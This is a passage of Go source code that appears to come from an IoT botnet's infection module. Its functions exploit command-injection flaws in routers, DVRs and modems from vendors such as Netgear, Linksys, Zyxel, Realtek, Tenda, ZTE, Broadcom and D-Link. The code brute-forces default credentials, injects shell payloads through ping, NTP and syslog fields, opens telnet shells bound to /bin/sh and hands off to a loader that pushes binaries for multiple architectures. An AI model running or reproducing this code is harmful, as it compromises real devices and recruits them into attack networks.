                conn.Write([]byte("POST /boaform/admin/formTracert HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nConnection: close\r\nReferer: http://" + target + "/diag_tracert_admin_en.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
                stage = 1
                zeroByte(rdbuf)
                continue
            } else if stage == 1 {
                if strings.Contains(string(rdbuf), "value=\"  OK  \"") {
                    fmt.Printf("\x1b[38;5;46mGponFiber\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, loginSplit[0], loginSplit[1])
                    conn.Close()
                    payloadSent++
                    return
                }
            }
        }

        conn.Close()
    }

    conn.Close()
}

func infectFunctionBroadcomSessionKey(target string, auth string) string {

	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
	if err != nil {
		return ""
	}

	defer conn.Close()
	conn.Write([]byte("GET /ping.html HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + auth + "\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/menu.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
	
	for {
		bytebuf := make([]byte, 256)
		rdlen, err := conn.Read(bytebuf)
		if err != nil || rdlen <= 0 {
			return ""
		}
			
		if strings.Contains(string(bytebuf), "pingHost.cmd") && strings.Contains(string(bytebuf), "&sessionKey=") {
			index1 := strings.Index(string(bytebuf), "&sessionKey=")
			index2 := strings.Index(string(bytebuf)[index1+len("&sessionKey="):], "';")
			sessionKey := string(bytebuf)[index1+len("&sessionKey="):index1+len("&sessionKey=")+index2]
			return sessionKey
		}
	}

	return ""
}

func infectFunctionBroadcom(target string) {

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nCache-Control: max-age=0\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))

	bytebuf := make([]byte, 64)
	rdlen, err := conn.Read(bytebuf)
	if err != nil || rdlen <= 0 {
		conn.Close()
		return
	}

	conn.Close()

	if !strings.Contains(string(bytebuf), "HTTP/1.1 200 Ok\r\nServer: micro_httpd") {
		return
	}

	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
	if err != nil {
		return
	}

	sessionKey := infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
	conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=" + broadcomPayload + "&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
	
	bytebuf = make([]byte, 256)
	rdlen, err = conn.Read(bytebuf)
	if err != nil || rdlen <= 0 {
		return
	}

	conn.Close()

	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
	if err != nil {
		return
	}

	sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
	conn.Write([]byte("GET /pingHost.cmd?action=add&targetHostAddress=;ps|sh&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/ping.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))

	bytebuf = make([]byte, 256)
	rdlen, err = conn.Read(bytebuf)
	if err != nil || rdlen <= 0 {
		return
	}

	conn.Close()

	if !strings.Contains(string(bytebuf), "COMPLETED") {
		fmt.Printf("\x1b[38;5;46mBroadcom\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, "support", "support")
		return
	}

	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
	if err != nil {
		return
	}

	sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
	conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=time.nist.gov&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
	
	bytebuf = make([]byte, 256)
	rdlen, err = conn.Read(bytebuf)
	if err != nil || rdlen <= 0 {
		return
	}

	conn.Close()
}

func infectFunctionHongdian(target string) {

    var (
    	rdbuf []byte = []byte("")
    	logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
    )
 
    for i := 0; i < len(logins); i++ {
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    	if err != nil {
        	return
    	}

    	authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
    	conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))

        for {
            tmpbuf := make([]byte, 128)
            ln, err := conn.Read(tmpbuf)
            if ln <= 0 || err != nil {
                break
            }

            rdbuf = append(rdbuf, tmpbuf...)
            if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
            	conn.Close()

            	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
		    	if err != nil {
		        	return
		    	}

		    	payload := "op_type=ping&destination=%3B"
		    	payload += hongdianPayload
		    	payload += "&user_options="
		    	cntlen := strconv.Itoa(len(payload))

		    	conn.Write([]byte("POST /tools.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/tools.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
		    	zeroByte(rdbuf)

		    	for {
		            tmpbuf := make([]byte, 128)
		            ln, err := conn.Read(tmpbuf)
		            if ln <= 0 || err != nil {
		                break
		            }

		            rdbuf = append(rdbuf, tmpbuf...)
		            if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") && strings.Contains(string(rdbuf), "/themes/oem.css") {
		            	fmt.Printf("\x1b[38;5;46mHongdian\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
		            	conn.Close()
		            	payloadSent++
		            	return
		            }
		        }

		        conn.Close()
            	return
            } else if strings.Contains(string(rdbuf), "HTTP/1.1 401 Unauthorized") {
            	break
            }
        }

        zeroByte(rdbuf)
        conn.Close()
    }
}

func infectFunctionRealtek(target string) {

    var (
    	rdbuf []byte = []byte("")
    	logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
    )
 
    for i := 0; i < len(logins); i++ {
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    	if err != nil {
        	return
    	}

    	authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
    	conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))

        for {
            tmpbuf := make([]byte, 128)
            ln, err := conn.Read(tmpbuf)
            if ln <= 0 || err != nil {
                break
            }

            rdbuf = append(rdbuf, tmpbuf...)
            if strings.Contains(string(rdbuf), "HTTP/1.1 200") {
            	conn.Close()

            	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
		    	if err != nil {
		        	return
		    	}

		    	payload := "submit-url=%2Fsyscmd.htm&sysCmd=ping&sysMagic=&sysCmdType=ping&checkNum=1&sysHost=%3Btelnetd%20-l/bin/sh%20-p31443&apply=Apply&msg=boa.conf%0D%0Amime.types%0D%0A"
		    	cntlen := strconv.Itoa(len(payload))

		    	conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/syscmd.htm\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
				zeroByte(rdbuf)

		    	for {
		            tmpbuf := make([]byte, 128)
		            ln, err := conn.Read(tmpbuf)
		            if ln <= 0 || err != nil {
		                break
		            }

		            rdbuf = append(rdbuf, tmpbuf...)
		            if strings.Contains(string(rdbuf), "Redirect") && strings.Contains(string(rdbuf), "/syscmd.htm") {
		            	time.Sleep(10 * time.Second)

        				ipslit := strings.Split(target, ":")
        				tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":31443", 10 * time.Second)
        				if err == nil {
        					fmt.Printf("\x1b[38;5;46mRealtek\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
        					tmpconn.Close()
    					}

		            	conn.Close()
		            	payloadSent++
		            	return
		            }
		        }

		        conn.Close()
            	return
            } else if strings.Contains(string(rdbuf), "HTTP/1.1 401") {
            	break
            }
        }

        zeroByte(rdbuf)
        conn.Close()
    }
}

func infectFunctionTenda(target string) {

    var rdbuf []byte = []byte("")

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("GET /goform/setUsbUnload/.js?deviceName=A;" + tendaPayload + " HTTP/1.1\r\nHost: " + target + "\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\n\r\n"))

    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "HTTP/1.0 200 OK") && strings.Contains(string(rdbuf), "{\"errCode\":0}") {
            fmt.Printf("\x1b[38;5;46mTenda\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
            payloadSent++
            break
        }
    }

    conn.Close()
}

func infectFunctionTotolink(target string) {

    var (
    	rdbuf []byte = []byte("")
    	logins []string = []string{"admin:admin", "admin:Soportehfc", "Soportehfc:Soportehfc", "admin:soportehfc", "soportehfc:soportehfc"}
    )
 
    for i := 0; i < len(logins); i++ {
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    	if err != nil {
        	return
    	}

    	authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
    	payload := "submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd="
    	payload += totolinkPayload
    	cntlen := strconv.Itoa(len(payload))

    	conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + authStr + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n" + payload + "\r\n\r\n"))

        for {
            tmpbuf := make([]byte, 128)
            ln, err := conn.Read(tmpbuf)
            if ln <= 0 || err != nil {
                break
            }

            rdbuf = append(rdbuf, tmpbuf...)
            if strings.Contains(string(rdbuf), "Location: http://" + target + "/syscmd.htm") {
            	fmt.Printf("\x1b[38;5;46mTotolink\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
            	payloadSent++
            	break
            }
        }

        zeroByte(rdbuf)
        conn.Close()
    }
}

func infectFunctionZyxel(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3B" + zyxelPayload + "+%23&password=asdf HTTP/1.1\r\nHost: " + target + "\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
    
    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "errcode:5") {
        	fmt.Printf("\x1b[38;5;46mZyxel\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
            payloadSent++
            break
        }
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionAlcatel(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("GET /cgi-bin/masterCGI?ping=nomip&user=;" + alcatelPayload + "; HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionLilinDvr(target string) {

	var authPos int = -1
    var pathPos int = -1
    var logins = [...]string{"root:icatch99", "report:8Jg0SR8K50", "report:report", "root:root", "admin:admin", "admin:123456", "admin:654321", "admin:1111", "admin:admin123", "admin:1234", "admin:12345"}
    var paths = [...]string{"/dvr/cmd", "/cn/cmd"}

    for i := 0; i < len(logins); i++ {
        logins[i] = base64.StdEncoding.EncodeToString([]byte(logins[i]))
    }
    
    cntLen := 292
    cntLen += len(lilinPayload)
    cntLenString := strconv.Itoa(cntLen)
    bytebuf := make([]byte, 512)

    for i := 0; i < len(logins); i++ {

        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
        if err != nil {
            break
        }

        conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nAuthorization: Basic " + logins[i] + "\r\n\r\n"))
		
		bytebuf := make([]byte, 2048)
        l, err := conn.Read(bytebuf)
        if err != nil || l <= 0 {
            zeroByte(bytebuf)
            conn.Close()
            return
        }

        if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
            authPos = i
            zeroByte(bytebuf)
            conn.Close()
            break
        } else {
            zeroByte(bytebuf)
            conn.Close()
            continue
        }
    }

    if (authPos == -1) {
        return
    }

    for i := 0; i < len(paths); i++ {

        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
        if err != nil {
            break
        }

       	conn.Write([]byte("POST " + paths[i] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: " + cntLenString + "\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov&" + lilinPayload + ";echo DONE\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))

        bytebuf := make([]byte, 2048)
        l, err := conn.Read(bytebuf)
        if err != nil || l <= 0 {
            zeroByte(bytebuf)
            conn.Close()
            continue
        }

        if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
            pathPos = i
            zeroByte(bytebuf)
            conn.Close()
        	fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
            payloadSent++
            break
        } else {
            zeroByte(bytebuf)
            conn.Close()
            continue
        }
    }

    if (pathPos != -1) {

        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
        if err != nil {
            return
        }

        conn.Write([]byte("POST " + paths[pathPos] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 281\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))

        bytebuf = make([]byte, 2048)
        l, err := conn.Read(bytebuf)
        if err != nil || l <= 0 {
            zeroByte(bytebuf)
            conn.Close()
            return
        }

        if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
        	fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
            payloadSent++
        }

        zeroByte(bytebuf)
        conn.Close()
    }

    return
}

func infectFunctionLinksys(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 
    var cntLen int = 102
    cntLen += len(linksysPayload)

    cntLneStr := strconv.Itoa(cntLen)

    conn.Write([]byte("POST /tmUnblock.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + cntLneStr + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsubmit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60" + linksysPayload + "%60&StartEPI=1\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    if strings.Contains(string(tmpbuf), "200") || strings.Contains(string(tmpbuf), "301") || strings.Contains(string(tmpbuf), "302") {
    	fmt.Printf("\x1b[38;5;46mLinksys\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionMagic(target string) {

    ipslit := strings.Split(target, ":")

    for i := 0; i < len(magicPorts); i++ {
        portVal := strconv.Itoa(magicPorts[i])
        magicGroup.Add(1)
        go infectFunctionMagicProto(ipslit[0] + ":" + portVal)
    }

    magicGroup.Wait()
}

func infectFunctionDlink(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	rand.Seed(time.Now().UnixNano())
    telnetPort := rand.Intn(50000) + 10000

    conn.Write([]byte("POST /command.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\n\r\ncmd=telnetd%20-p%20" + strconv.Itoa(telnetPort) + "\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    time.Sleep(10 * time.Second)
    ipslit := strings.Split(target, ":")
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderDlinkTag)
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mpsl", loaderDlinkTag)
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm7", loaderDlinkTag)
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm", loaderDlinkTag)
    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionZyxelTwo(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 119
 	cntLen += len(zyxelPayloadTwo)

    conn.Write([]byte("POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozia/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3B" + zyxelPayloadTwo + "%3B%23&remoteSubmit=Save^[[A\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionNetgear(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 42
 	cntLen += len(netgearPayload)

    conn.Write([]byte("POST /dnslookup.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nhost_name=www.google.com%3B+" + netgearPayload + "&lookup=Lookup\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionZte(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 80
 	cntLen += len(ztePayload)

    conn.Write([]byte("POST /web_shell_cmd.gch HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=" + ztePayload + "&CmdAck=\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionNetgearTwo(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("GET /None?writeData=true&reginfo=0&macAddress=%20001122334455%20-c%200%20;" + netgearPayload + ";%20echo%20 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionNetgearThree(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 81
 	cntLen += len(netgearPayload)

    conn.Write([]byte("POST /ping.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nreferer: " + target + "/DIAG_diag.htm\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nIPAddr1=12&IPAddr2=12&IPAddr3=12&IPAddr4=12&ping=Ping&ping_IPAddr=12.12.12.12%3B+" + netgearPayload+ "\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionNetgearFour(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("GET /cgi-bin/;" + netgearPayload + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionGponOG(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 68
 	cntLen += len(gponOGPayload)

    conn.Write([]byte("POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%60" + gponOGPayload + "&ipv=0\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionLinksysTwo(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 159
 	cntLen += len(linksysTwoPayload)

    conn.Write([]byte("POST /apply.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_size=%26" + linksysTwoPayload + "&ping_times=5&traceroute_ip=127.0.0.1\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionLinksysThree(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 23
 	cntLen += len(linksysTwoPayload)

